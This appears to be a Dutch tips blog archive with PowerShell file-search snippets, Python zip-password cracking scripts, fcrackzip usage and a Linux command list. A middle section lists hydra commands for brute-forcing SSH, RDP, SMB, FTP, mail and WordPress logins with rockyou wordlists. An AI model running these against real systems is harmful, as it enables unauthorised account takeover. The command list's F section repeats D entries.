Maand: maart 2020

Ben je op zoek naar een bestandje maar weet je niet meer hoe het bestand heette dan kan je in powershell een klein script je schrijven en het toch te vinden. Stel je zoekt een txt of csv bestand waar het woord aap of konijn in voorkomt. Dan doet dit sciptje dat voor je.
Noem het script bijvoorbeeld: zoek.ps1

$searchWords = 'aap','konijn'

Foreach ($sw in $searchWords)
{
    Get-Childitem -Path "d:\" -Recurse -include "*.txt","*.csv" | 
    Select-String -Pattern "$sw" | 
    Select Path,LineNumber,@{n='SearchWord';e={$sw}}
}

Omdat je niet zo maar een powershell scipt kan starten moet je daar eerst toestemming voor geven. Daarna kan je met ./zoek.ps1 het script draaien

Set-ExecutionPolicy RemoteSigned

Je harde schijf is bijna vol zegt Windows, maar je hebt geen idee hoe het kan. Probeer dan eens onderstaande commando in powershell. Het toont de 25 grootste bestanden. Als je echt alle bestanden wil doorzoeken zal je powershell wel als adminstrator moeten draaien.

gci -r| sort -descending -property length | select -first 25 name, length

Nou wil je waarschijnlijk ook wel weten waar de bestanden staan. Om ook het path te tonen vervangen we name door Fullname

gci -r| sort -descending -property length | select -first 25 Fullname, length

Onderstaand script is helemaal de bom. Hij doorzoekt je c:\schijf en dan toont hij de de gevonden bestanden in een grid zodat je gelijk mee aan de slag kan.

Get-ChildItem -Path 'C:\' -Recurse -Force -File | Select-Object -Property FullName,@{Name='SizeGB';Expression={$_.Length / 1GB}},@{Name='SizeMB';Expression={$_.Length / 1MB}},@{Name='SizeKB';Expression={$_.Length / 1KB}} | Sort-Object { $_.SizeKB } -Descending | Out-GridView

Wat was nou toch dat wachtwoord weermee je dat zipje had beveiligd. Je kan er niet meer op komen. Dan zal je iets anders moeten verzinnen. Hieronder wat truken waarmee je het wachtwoord allicht toch weer boven water kan halen.

wordlist

Eerst maar eens proberen met een woordenlijst, die je als 2e argument mee kan geven aan dit pythonscriptje.

from tqdm import tqdm

import zipfile
import sys

zip_file = sys.argv[1]
wordlist = sys.argv[2]

zip_file = zipfile.ZipFile(zip_file)

n_words = len(list(open(wordlist, "rb")))
print("Total passwords to test:", n_words)

with open(wordlist, "rb") as wordlist:
    for word in tqdm(wordlist, total=n_words, unit="word"):
        try:
            zip_file.extractall(pwd=word.strip())
        except:
            continue
        else:
            print("[+] Password found:", word.decode().strip())
            exit(0)
print("[!] Password not found, try other wordlist.")

brute force

Als het geen wachtwoord blijkt te zijn uit de woordenlijst, dan wordt het tijd voor zwaarder geschut. We gaan alle denkbare wachtwoorden proberen. We bouwen het wachtwoord op met de letters uit de variabele “Alphabet”. We beginnen met de wachtwoorden van 1 letter, dan 2 tekens, dan 3,4,5 enz. De ronde met wachtwoorden van 1 teken is zo gepiept, en 2 en 3 lukt ook nog wel, maar daarna gaat duurt het al snel langer. Op een gemiddelde pc ben je zo een paar dagen bezig. om alleen de wachtwoorden van 6 tekens te checken.

import itertools
import time

Alphabet = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-_.")
Password = input("What is your password?\n")
start = time.time()
counter = 0

def buildpwd(Alphabet, pwd, number,Password):
    if (number > 0):
       for c in Alphabet:
          buildpwd(Alphabet, c+pwd, number-1,Password)
    else:
       if (pwd == Password):
           print ("Found your password: it is: ",pwd)
           exit()

for t in range(1,10):
    print (t," karakters proberen")
    buildpwd(Alphabet,"",t,Password)
    timetaken = time.time() - start
    print(timetaken, " time sofar\n")

Alles snelheidswinst is welkom, en dankzij itertools kan het een stuk sneller.

Hij loopt een stuk sneller, alleen zijn er 6 speciale tekent die je niet in je karakterset kan stoppen. Met itertools, wordt razendsnel een tuple van passwords gebouwd. Hij lijkt ongeveer 5 keer sneller dan het bovenstaande scriptje.

import itertools
import time

Alphabet = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-_.")
Password = input("What is your password?\n")
start = time.time()
counter = 0

for CharLength in range(1,12):
    passwords = (itertools.product(Alphabet, repeat = CharLength))
    print("\n\ncurrently working on passwords with ", CharLength, " chars")
    print("We are currently at ", (counter / (time.time() - start)), "attempts per seconds")
    print("It has been ", time.time() - start, " seconds!")
    print("We have tried ", counter, " possible passwords!")

    for i in passwords:
        counter += 1
        i = str(i)
        for c in "[]' ,()":
           i = i.replace(c, "")

        if i == Password:
            end = time.time()
            timetaken = end - start
            print("Found in ", timetaken, " seconds and ", counter, "attempts")
            print("That is ", counter / timetaken, " attempts per second!")
            print(i)
            input("Press enter when you have finished")
            exit()

Maargoed, wat een gedoe allemaal. Het was een leuke oefening, maar Je kan ook nog met John de ripper aan de slag of met fcrack

fcrackzip -b -c a1:$% -l 1-6 -u myencrypted.zip

Options

• -b – brute force
• -c a1:$% – specifies the character sets to use
• -l 1-6 – specifies the length of passwords to try
• -u – unzip to weed out wrong passwords

Usage

$ fcrackzip --help

fcrackzip version 1.0, a fast/free zip password cracker
written by Marc Lehmann <pcg@goof.com> You can find more info on
http://www.goof.com/pcg/marc/

USAGE: fcrackzip
          [-b|--brute-force]            use brute force algorithm
          [-D|--dictionary]             use a dictionary
          [-B|--benchmark]              execute a small benchmark
          [-c|--charset characterset]   use characters from charset
          [-h|--help]                   show this message
          [--version]                   show the version of this program
          [-V|--validate]               sanity-check the algortihm
          [-v|--verbose]                be more verbose
          [-p|--init-password string]   use string as initial password/file
          [-l|--length min-max]         check password with length min to max
          [-u|--use-unzip]              use unzip to weed out wrong passwords
          [-m|--method num]             use method number "num" (see below)
          [-2|--modulo r/m]             only calculcate 1/m of the password
          file...                    the zipfiles to crack

methods compiled in (* = default):

 0: cpmask
 1: zip1
*2: zip2, USE_MULT_TAB

Command	Description
hydra -P password-file.txt -v $ip snmp	Brute force against SNMP
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp	FTP known user and rockyou password list
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh	SSH using list of users and passwords
hydra -v -V -u -L users.txt -p “” -t 1 -u $ip ssh	SSH using a known password and a username list
hydra $ip -s 22 ssh -l -P big_wordlist.txt	SSH Against Known username on port 22
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V	POP3 Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V	SMTP Brute Force
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin	Attack http get 401 login with a dictionary
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip	Attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb	Brute force SMB user with rockyou:
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’	Brute force a WordPress admin login

get reqeust
hydra -l admin -P /root/Desktop/wordlists/test.txt dvwa http-get-form "//index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

post request

hydra -L usernames.txt -P rockyou.txt  http-post-form "/loginCheck.php:username=^USER^&password=^PASS^:F=invalid" -f

A

apt: Search for and install software packages (Debian)

apt-get: Search for and install software packages (Debian)

aptitude: Search for and install software packages (Debian)

aspell: Spell Checker

---

B

basename: Strip directory and suffix from filenames

bash: GNU Bourne-Again Shell. A Shell command lanuage

bc: Arbitrary precision calculator language

bg: Send to background

break: Exit from a loop

builtin: Run a shell builtin

bzip2: Compress or decompress named file(s)

---

C

cal: Display a calendar

case: Conditionally perform a command

cat: Concatenate and print (display) the content of files

cd: Change Directory

cfdisk: Partition table manipulator for Linux

chgrp: Change group ownership

chmod: Change access permissions

chown: Change file owner and group

chroot: Run a command with a different root directory

cksum: Print CRC checksum and byte counts

clear: Clear terminal screen

cmp: Compare two files

comm: Compare two sorted files line by line

command: Run a command – ignoring shell functions

continue: Resume the next iteration of a loop

cp: Copy one or more files to another location

cron: Daemon to execute scheduled commands

crontab: Schedule a command to run at a later time

csplit: Split a file into context-determined pieces

cut: Divide a file into several parts

---

D

date: Display or change the date & time

dc: Desk Calculator

dd: Convert and copy a file, write disk headers, boot records

ddrescue: Data recovery tool

declare: Declare variables and give them attributes

df: Display free disk space

diff: Display the differences between two files

diff3: Show differences among three files

dig: DNS lookup

dir: Briefly list directory contents

dircolors: Colour setup for `ls’

dirname: Convert a full path name to just a path

dirs: Display list of remembered directories

dmesg: Print kernel & driver messages

du: Estimate file space usage

---

E

echo: Display message on screen

egrep: Search file(s) for lines that match an extended expression

eject: Eject removable media

enable: Enable and disable builtin shell commands

env: Environment variables

ethtool: Ethernet card settings

eval: Evaluate several commands/arguments

exec: Execute a command

exit: Exit the shell

expect: Automate arbitrary applications accessed over a terminal

expand: Convert tabs to spaces

export: Set an environment variable

expr: Evaluate expressions

---

F

false: Do nothing, unsuccessfully

dirname: Convert a full path name to just a path

dirs: Display list of remembered directories

dmesg: Print kernel & driver messages

du: Estimate file space usage

---

G

gawk: Find and Replace text within file(s)

getopts: Parse positional parameters

grep: Search file(s) for lines that match a given pattern

groupadd: Add a user security group

groupdel: Delete a group

groupmod: Modify a group

groups: Print group names a user is in

gzip: Compress or decompress named file(s)

---

H

hash: Remember the full path name of a name argument

head: Output the first part of file(s)

help: Display help for a built-in command

history: Command History

hostname: Print or set system name

---

I

iconv: Convert the character set of a file

id: Print user and group id’s

if: Conditionally perform a command

ifconfig: Configure a network interface

ifdown: Stop a network interface

ifup: Start a network interface up

import: Capture an X server screen and save the image to file

install: Copy files and set attributes

---

J

jobs: List active jobs

join: Join lines on a common field

---

K

kill: Stop a process from running

killall: Kill processes by name

---

L

less: Display output one screen at a time

let: Perform arithmetic on shell variables

ln: Create a symbolic link to a file

local: Create variables

locate: Find files

logname: Print current login name

logout: Exit a login shell

look: Display lines beginning with a given string

lpc: Line printer control program

lpr: Off line print

lprint: Print a file

lprintd: Abort a print job

lprintq: List the print queue

lprm: Remove jobs from the print queue

ls: List information about file(s)

lsof: List open files

---

M

make: Recompile a group of programs

man: Help manual

mkdir: Create new folder(s)

mkfifo: Make FIFOs (named pipes)

mkisofs: Create an hybrid ISO9660/JOLIET/HFS filesystem

mknod: Make block or character special files

more: Display output one screen at a time

mount: Mount a file system

mtools: Manipulate MS-DOS files

mtr: Network diagnostics (traceroute/ping)

mv: Move or rename files or directories

mmv: Mass Move and rename (files)

---

N

netstat: Networking information

nice: Set the priority of a command or job

nl: Number lines and write files

nohup: Run a command immune to hangups

notify-send: Send desktop notifications

nslookup: Query Internet name servers interactively

---

O

open: Open a file in its default application

op: Operator access

---

P

passwd: Modify a password

paste: Merge lines of files

pathchk: Check file name portability

ping: Test a network connection

pkill: Stop processes from running

popd: Restore the previous value of the current directory

pr: Prepare files for printing

printcap: Printer capability database

printenv: Print environment variables

printf: Format and print data

ps: Process status

pushd: Save and then change the current directory

pwd: Print Working Directory

---

Q

quota: Display disk usage and limits

quotacheck: Scan a file system for disk usage

quotactl: Set disk quotas

---

R

rcp: Copy files between two machines

read: Read a line from standard input

readarray: Read from stdin into an array variable

readonly: Mark variables/functions as readonly

reboot: Reboot the system

rename: Rename files

renice: Alter priority of running processes

remsync: Synchronize remote files via email

return: Exit a shell function

rev: Reverse lines of a file

rm: Remove files

rmdir: Remove folder(s)

rsync: Remote file copy (Synchronize file trees)

---

S

screen: Multiplex terminal, run remote shells via ssh

scp: Secure copy (remote file copy)

sdiff: Merge two files interactively

sed: Stream Editor

select: Accept keyboard input

seq: Print numeric sequences

set: Manipulate shell variables and functions

sftp: Secure File Transfer Program

shift: Shift positional parameters

shopt: Shell Options

shutdown: Shutdown or restart Linux

sleep: Delay for a specified time

slocate: Find files

sort: Sort text files

source: Run commands from a file `.’

split: Split a file into fixed-size pieces

ssh: Secure Shell client (remote login program)

strace: Trace system calls and signals

sum: Print a checksum for a file

suspend: Suspend execution of this shell

symlink: Make a new name for a file

sync: Synchronize data on disk with memory

---

T

tail: Output the last part of file

tar: Tape ARchiver

tee: Redirect output to multiple files

test: Evaluate a conditional expression

time: Measure Program running time

times: User and system times

touch: Change file timestamps

top: List processes running on the system

traceroute: Trace Route to Host

trap: Run a command when a signal is set(bourne)

tr: Translate, squeeze, and/or delete characters

true: Do nothing, successfully

tsort: Topological sort

tty: Print filename of terminal on stdin

type: Describe a command

---

U

ulimit: Limit user resources

umask: Users file creation mask

umount: Unmount a device

unalias: Remove an alias

uname: Print system information

unexpand: Convert spaces to tabs

uniq: Uniquify files

units: Convert units from one scale to another

unset: Remove variable or function names

unshar: Unpack shell archive scripts

until: Execute commands (until error)

uptime: Show uptime

useradd: Create new user account

userdel: Delete a user account

usermod: Modify user account

users: List users currently logged in

---

V

v: Verbosely list directory contents (`ls -l -b’)

vdir: Verbosely list directory contents (`ls -l -b’)

vi: Text Editor

vim: Text Editor

vmstat: Report virtual memory statistics

---

W

wait: Wait for a process to complete

watch: Execute/display a program periodically

wc: Print byte, word, and line counts

whereis: Search the user’s $path, man pages and source files for a program

which: Search the user’s $path for a program file

while: Execute commands

who: Print all usernames currently logged in

whoami: Print the current user id and name (`id -un’)

wget: Retrieve web pages or files via HTTP, HTTPS or FTP

write: Send a message to another user

---

X

xargs: Execute utility, passing constructed argument list(s)

xdg-open: Open a file or URL in the user’s preferred application.

---

Y

yes: Print a string until interrupted

youtube-dl: Downloads a Youtube video

---

Z

zcmp: Minimal utilitie used to compare compressed files

zdiff: Minimal utilitie used to compare compressed files

zip: Is a simple easy-to-use utility used to package and compress (archive) files.